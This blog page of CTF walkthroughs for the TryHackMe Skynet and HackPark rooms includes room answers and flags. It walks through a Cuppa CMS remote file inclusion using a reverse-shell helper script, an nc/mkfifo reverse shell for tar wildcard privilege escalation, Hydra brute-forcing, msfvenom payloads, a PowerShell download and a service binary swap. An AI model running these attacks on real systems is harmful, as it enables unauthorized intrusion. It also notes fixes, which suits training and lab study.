thm-terminator-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play a CTF called terminator at

Hasta la vista, baby.

Are you able to compromise this Terminator themed machine?

You can follow our official walkthrough for this challenge on our blog.


#1 What is Miles' password for his emails?
cyborg007haloterminator
#2 What is the hidden directory?
#3 What is the vulnerability called when you can include a remote file for malicious purposes?
remote file inclusion
#4 What is the user flag?
#5 What is the root flag?
3f0372db24753accc7179a282cd6a949

Skynet Writeup
Follow along with this writeup, and deploy your own instance of Skynet! https://tryhackme.com/room/skynet
Summary:

  • Scan ports using nmap
  • Use GoBuster to enumerate directories
  • Experiment with SMBMap to find Samba shares
  • Use enumerated credentials to read emails
  • Exploit CMS RFI vulnerability
  • Exploit tar wildcards for privilege escalation

Let's begin by enumerating the machine as thoroughly as possible using nmap.

nmap -sV <ip>

We can see that there is a web server running; upon visiting it we see the following:

“Skynet” is an artificial neural network-based conscious group mind and artificial general intelligence system

Let's use GoBuster to locate any directories!

gobuster dir -u http://<ip> -w <wordlist_location> -t 40

(Older GoBuster releases take the same flags without the dir subcommand.)

Sometimes, we’re confident that there is something to be found and we waste too much time on it. Often, there are rabbit holes that can trip you up. Make sure to take breaks if you get stuck and try different approaches.

Going back to the drawing board: we saw that the POP3 and IMAP ports were open, so what else could potentially be found? Remember what I said above!

SMBMap enumerates Samba share drives across an entire domain and is available on all Kali Linux machines (TryHackMe also offers a browser-based Kali machine if you do not have one). Running it against the host (smbmap -H <ip>) reveals a share called “anonymous” with read access. Let's connect to the share with a null session and investigate.

smbclient -N //<ip>/anonymous

Log1.txt contains possible passwords, and there is also an SMB share called milesdyson. We have some potential credentials here... but SSH is disabled! What else can we do?

An earlier GoBuster scan revealed SquirrelMail!

Gasp! Reading his emails reveals a Samba password reset!

Lets log into Miles’ share and see what interesting things we can find! You should find a file that gives you information about a new CMS.

Visiting the CMS reveals Miles Dyson's personal page.

If you use GoBuster on the /45kra24zxs28v3yd/ directory, you will reveal an /administrator page. This reveals a Cuppa CMS!

Looking at the source code will give you an indication of the CMS’ version. After some online research, there is a public exploit for it! https://www.exploit-db.com/exploits/25971

Get a PHP reverse shell (PentestMonkey's php-reverse-shell.php works), change its IP to your tun0 address (check with ip addr or ifconfig) and its port to one you will listen on, host it locally with Python's http.server, start a netcat listener on that port, and then remotely include the hosted file through the vulnerable parameter on the web server.

That sequence gives you a low-privilege shell, running as the web server's user, by exploiting the RFI vulnerability.

So what's actually going on here? In the CMS code there is a bit of PHP that includes whatever file name the request supplies:

<?php include($_REQUEST["urlConfig"]); ?>

$_REQUEST covers GET, POST and cookie values, so the urlConfig parameter is entirely attacker-controlled. With allow_url_include enabled (it is off by default in PHP, but it is on here), include() fetches a remote URL and executes the PHP it returns, which is how our hosted shell ends up running on the web server. Even with remote includes disabled, the same line still allows local file inclusion (for example of /etc/passwd) and path traversal. The fix is never to pass user input to include(); map a request parameter onto a fixed list of allowed files instead. For a more detailed explanation, please read the exploit-db description.
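The attacker side of the steps above (patch the shell, host it, listen, trigger the include), written out as an added POSIX shell helper; this is my own example, not code from the writeup, TryHackMe or the exploit-db author. It assumes pentestmonkey's php-reverse-shell.php sits in the current directory, that the payload is served from port 8000 and the listener waits on port 1234, and it uses the include endpoint named in the linked exploit-db entry (alerts/alertConfigField.php with the urlConfig parameter). The CMS URL and tun0 address passed on the command line are placeholders.

```shell
#!/bin/sh
# Added example (attacker-side helper, not part of the original writeup).
# Assumptions: php-reverse-shell.php is in the current directory, the payload
# is served on port 8000 and the reverse shell calls back to port 1234.
set -u

# Rewrite the two "CHANGE THIS" lines of pentestmonkey's php-reverse-shell.php
# so the shell calls back to our tun0 address and listener port.
patch_shell() {   # patch_shell <in.php> <out.php> <lhost> <lport>
    sed -e "s/^[$]ip = '[^']*';.*/\$ip = '$3';/" \
        -e "s/^[$]port = [0-9]*;.*/\$port = $4;/" "$1" > "$2"
}

# Build the include URL: per EDB-ID 25971, alerts/alertConfigField.php passes
# the urlConfig parameter straight into include().
rfi_url() {       # rfi_url <cms base url> <payload url>
    printf '%s/alerts/alertConfigField.php?urlConfig=%s\n' "$1" "$2"
}

# Serve the patched shell, trigger the include with a plain GET and wait for
# the callback. Only runs when the script is invoked with "go".
exploit() {       # exploit <cms base url> <tun0 address>
    patch_shell php-reverse-shell.php shell.txt "$2" 1234
    python3 -m http.server 8000 >/dev/null 2>&1 &
    httpd=$!
    # Give the server a moment, then trigger the include in the background
    # while the listener below waits in the foreground for the shell.
    (sleep 2; curl -s "$(rfi_url "$1" "http://$2:8000/shell.txt")" >/dev/null) &
    nc -lvnp 1234
    kill "$httpd"
}

if [ "${1:-}" = "go" ]; then
    exploit "$2" "$3"
fi
```

Only the two pure helpers run offline; `sh rfi.sh go http://<ip>/45kra24zxs28v3yd/administrator <tun0 ip>` performs the actual exploitation. The served file's extension does not matter: python's http.server returns it verbatim and PHP evaluates whatever the include fetches.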

Now that we have a shell, we can get the user flag. Next step is to escalate our privileges to root!

Upon enumerating the Linux machine (cat /etc/crontab), we can see several regular cron jobs.

One of them, /home/milesdyson/backups/backup.sh, runs as root every minute. Inspecting this file:

It is a short shell script that changes into the /var/www/html directory and runs tar with a * wildcard to back up everything in that directory into an archive.

Well, believe it or not, this creates a vulnerability we can use to execute code as root. HelpNetSecurity has a good explanation of how it works, but in essence: the shell expands the unquoted * into the file names in /var/www/html before tar runs, and GNU tar parses any argument starting with -- as an option. A file named --checkpoint=1 therefore turns on a checkpoint after every record, and a file named --checkpoint-action=exec=sh shell.sh tells tar to run that command (through /bin/sh -c, with /var/www/html as the working directory) at each checkpoint. Because the cron job runs as root, so does our command.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip> 1234 >/tmp/f" > /var/www/html/shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"

Note that shell.sh must live in /var/www/html, because sh shell.sh is resolved relative to tar's working directory. Then start a netcat listener on your machine (nc -lvnp 1234); the next time the cron job fires, within a minute, you receive a shell as root!
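To see the mechanism without the box, here is an added example (my own, not the writeup's code) that replays the cron job's tar call against a throwaway web root under $TMPDIR. The planted shell.sh only drops a marker file instead of opening a reverse shell, and the hardened variant archives the directory by name so the planted file names never reach tar's option parser. It needs GNU tar; the directory and marker file names are assumptions.

```shell
#!/bin/sh
# Added example, not from the original writeup: reproduces the tar wildcard
# injection locally so you can watch it fire (and not fire). The work
# directory under $TMPDIR and the marker file name are assumptions.
set -u

WORK="${TMPDIR:-/tmp}/tar-wildcard-demo.$$"

# Build a fake web root. Instead of a reverse shell, the planted shell.sh just
# creates a marker file so that execution is observable.
setup_webroot() {
    rm -rf "$WORK"
    mkdir -p "$WORK/html"
    printf 'hello\n' > "$WORK/html/index.html"
    printf 'touch "%s/pwned"\n' "$WORK" > "$WORK/html/shell.sh"
    # These are file names, not options: they only become options once a
    # shell expands an unquoted * into them on tar's command line.
    touch "$WORK/html/--checkpoint=1"
    touch "$WORK/html/--checkpoint-action=exec=sh shell.sh"
}

# backup.sh as the cron job runs it: cd into the web root, then tar with '*'.
# GNU tar parses the two planted names as options and runs "sh shell.sh"
# (via /bin/sh -c, with the web root as working directory) at the first
# checkpoint. Prints "executed" or "not-executed".
run_wildcard_backup() {
    setup_webroot
    (cd "$WORK/html" && tar cf "$WORK/backup.tgz" *) 2>/dev/null
    if [ -e "$WORK/pwned" ]; then echo executed; else echo not-executed; fi
}

# Hardened variant: name the directory, not its contents. The planted files
# are stored as ordinary archive members and never reach tar's option parser.
run_hardened_backup() {
    setup_webroot
    (cd "$WORK/html" && tar cf "$WORK/backup.tgz" .) 2>/dev/null
    if [ -e "$WORK/pwned" ]; then echo executed; else echo not-executed; fi
}

cleanup() { rm -rf "$WORK"; }

# Run directly with "sh tar-wildcard-demo.sh show" to print both outcomes.
if [ "${1:-}" = "show" ]; then
    echo "tar cf backup.tgz *  -> $(run_wildcard_backup)"
    echo "tar cf backup.tgz .  -> $(run_hardened_backup)"
    cleanup
fi
```

The same fix applies to any script that globs untrusted directories into a command line: pass a directory or a file list read with --null from find, or end option parsing with -- before the glob, so that file names can never be interpreted as options.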

thm-hackpark-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play a CTF called hackpark at

Connect to our network and deploy this machine. Please be patient as this machine can take up to 5 minutes to boot! You can test if you are connected to our network, by going to our access page. Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.

This room will cover brute-forcing an accounts credentials, handling public exploits, using the Metasploit framework and privilege escalation on Windows.


#1 Deploy the machine and access its web server.
#2 Whats the name of the clown displayed on the homepage?


[Task 2] Using Hydra to brute-force a login

Hydra is a parallelized, fast and flexible login cracker. If you don’t have Hydra installed or need a Linux machine to use it, you can deploy a powerful Kali Linux machine and control it in your browser!

Brute-forcing means trying every possible password. A dictionary attack is also a form of brute-forcing, where we iterate through a wordlist to obtain the password.


#1 We need to find a login page to attack and identify what type of request the form is making to the web server. Typically, a login form sends one of two request types: a GET request, used to retrieve data from a web server, or a POST request, used to send data to the server.

You can check which request a form makes by right-clicking on the login form, inspecting the element and reading the value of the method attribute. You can also identify it by intercepting the traffic through Burp Suite.

What request type is the Windows website login form using?

#2 Now that we know the request type and have a URL for the login form, we can get started brute-forcing an account.

Run the following command but fill in the blanks (the last argument is the module's colon-separated form string):

hydra -l <username> -P /usr/share/wordlists/<wordlist> <ip> http-post-form "<login page path>:<request body with ^USER^ and ^PASS^>:<failure string>"

Guess a username, choose a password wordlist and gain credentials to a user account!

#3 Hydra really does have lots of functionality, and there are many “modules” available (an example of a module would be the http-post-form that we used above).

However, this tool is not only good for brute-forcing HTTP forms, but other protocols such as FTP, SSH, SMTP, SMB and more.

Below is a mini cheatsheet:

hydra -P <wordlist> -v <ip> <protocol>
    Brute force against a protocol of your choice.

hydra -v -V -u -L <username list> -P <password list> -t 1 <ip> <protocol>
    Brute force usernames as well as passwords; Hydra tries every combination from both lists (-vV is verbose mode showing each login attempt, -u tries each password against all users before moving to the next password, -t 1 runs a single task).

hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip>
    Attack a Windows Remote Desktop with a password list (-f stops after the first valid login).

hydra -l <username> -P <password list> <ip> -V http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
    Craft a more specific request for Hydra to brute force; here S=Location marks a successful login by the Location header in the response.

In this task, you will identify and execute a public exploit (from exploit-db.com) to get initial access on this Windows machine!

Exploit-Database is an archive of public exploits and the corresponding vulnerable software, cross-referenced with CVE (Common Vulnerabilities and Exposures) IDs and maintained for penetration testers and vulnerability researchers. It is owned by Offensive Security (who are also responsible for OSCP and Kali).


#1 Now you have logged into the website, are you able to identify the version of the BlogEngine?
#2 Use the exploit database archive to find an exploit to gain a reverse shell on this system.

What is the CVE?

#3 Using the public exploit, gain initial access to the server.

Who is the webserver running as?


In this task we will learn about the basics of Windows Privilege Escalation.

First we will pivot from netcat to a meterpreter session and use this to enumerate the machine to identify potential vulnerabilities. We will then use this gathered information to exploit the system and become the Administrator.


#1 Our netcat session is a little unstable, so lets generate another reverse shell using msfvenom.

If you don’t know how to do this, I suggest completing up to task 3 in our Metasploit room first!

Tip: You can generate the reverse-shell payload using msfvenom, upload it using your current netcat session and execute it manually!

#2 You can run metasploit commands such as sysinfo to get detailed information about the Windows system. Then feed this information into the windows-exploit-suggester script and quickly identify any obvious vulnerabilities.

What is the OS version of this windows machine?

#3 Further enumerate the machine.

What is the name of the abnormal service running?

#4 What is the name of the binary you’re supposed to exploit?
#5 Using this abnormal service, escalate your privileges!

What is the user flag (on Jeff's Desktop)?

#6 What is the root flag?

In this task we will escalate our privileges without the use of meterpreter/metasploit!

Firstly, we will pivot from our netcat session that we have established, to a more stable reverse shell.

Once we have established this we will use winPEAS to enumerate the system for potential vulnerabilities, before using this information to escalate to Administrator.


#1 Now we can generate a more stable shell using msfvenom. Instead of a Meterpreter payload, this time let's set our payload to windows/shell_reverse_tcp.
#2 After generating our payload we need to pull this onto the box using powershell.

Tip: It’s common to find C:\Windows\Temp is world writable!
#3 Now that you know how to pull files from your machine to the victim's machine, we can pull winPEAS.bat onto the system using the same method! (winPEAS is published in the PEASS-ng repository on GitHub.)

WinPeas is a great tool which will enumerate the system and attempt to recommend potential vulnerabilities that we can exploit. The part we are most interested in for this room is the running processes!

Tip: You can execute these files by using .\filename.exe

Using winPEAS, what was the original install time of the server? (This is a date and time; systeminfo in a cmd shell also shows it.)

Writeup :

Try it for yourself here.

Deployment and reverse image search

After the machine deployed I opened the website and got prompted by this friendly clown:

I guess most of you recognized him right off the bat as Pennywise from the Movie IT. I didn’t, so I used reverse image search to find who he is. Google didn’t provide any good output, but TinEye did.

Login brute force with Hydra

The website has a login section. TryHackMe prompts us to guess a user name, so we'll use good old “admin”. Here's how the Hydra command to brute-force the web form is put together:

Don’t panic, it’s not really complicated

Most of the command consists of the string after “http-post-form”. This string has three parts divided by colons: “path to the login form page : request body : error message indicating failure”. A literal colon inside one of the parts must be escaped as \:, and if you would rather match on success, prefix the last part with S=.

To get this information, open the Network tab in the developer tools, send one login request with random credentials and inspect it by clicking “Edit and Resend”.

The request body can be found in the “Request Body” section at the bottom. Before pasting it in the terminal we need to find where the credentials are used, so Hydra knows where to insert its guesses.

Now I can replace the “asdf” I entered with ^USER^ and ^PASS^ for Hydra.

One last piece of information Hydra needs is a message indicating failure, so it can tell when the guessed password is correct. On a failed login, the site prompts us with “Login failed”. That's exactly the string we need.

After running Hydra and obtaining the password we can log into BlogEngine as admin 🔥

Compromise the machine

The first thing to do is check the version of BlogEngine. It can be found in the “About” tab. A quick Google search for this version turned up an exploit on exploit-db.

The same exploit can be located offline with the “searchsploit” command on Kali Linux; pick the entry that matches the version you identified.

Inside the exploit, a comment specified exactly what we needed to do to get this running. Firstly change the address and port of the attacker to yours.

Rename the exploit to PostView.ascx. It should be uploaded via editing a post:

To upload the file edit the only post on the website and click the folder icon marked above

To get the reverse shell we only need to start a Netcat listener and navigate to http://10.10.147.54/?theme=../../App_Data/files

There is nothing prettier than getting a reverse shell

By running whoami we see that the server is running as “iis apppool\blog”.

Privilege Escalation [without Metasploit]

Before scanning the machine to find a way to escalate privileges, let's get a stable shell. We will create a reverse shell executable with msfvenom:

msfvenom -p windows/shell_reverse_tcp -a x86 -e x86/shikata_ga_nai LHOST=[your_ip] LPORT=[listening_port] -f exe -o [shell_name.exe]

Now the payload is ready. Start a small web server so the machine can download the executable: python3 -m http.server (it serves the current directory on port 8000).

We don't have write permissions to the current folder, so save the download into C:\Windows\Temp. DownloadFile takes two arguments, the URL and the local path to write to; note that the URL uses the web server's port (8000), not the listener port:

powershell "(New-Object System.Net.WebClient).DownloadFile('http://[your_ip]:8000/[shell_name.exe]', 'C:\Windows\Temp\[shell_name.exe]')"

Amazing. Now listen on the port you specified with LPORT and run the executable.

A stable reverse shell

The same way we sent this reverse shell we can send an enumeration script. I used winPEAS.

Analyzing the results of the enumeration took a while. Under the “Running Processes” section there is a process named “Message.exe”. Further inspection shows that it keeps starting and stopping repeatedly, so something more privileged relaunches it on a schedule. If we can replace Message.exe with our reverse shell executable, the next launch gives us a shell with those higher privileges.

Message.exe can be found under C:\Program Files (x86)\SystemScheduler. Rename Message.exe to Message.bak, upload your shell the same way as before and rename it to Message.exe. Don't forget to listen on the port you specified!

Wait a little and voilà, we have a shell. Running whoami returns:

These permissions are enough to access both “jeff” and “Administrator” that hold the user and root flags.

Author: Jacco Straathof

Protected: htb-magic-nl

This content is password protected. Enter the password below to view it.

Protected: thm-steelmountain-nl

Protected: thm-vulnversity-nl

Protected: htb-servmon-nl

Protected: htb-forwardslash-nl

Protected: htb-endgame-poo

Protected: htb-endgame-xen

Protected: htb-onetwoseven-nl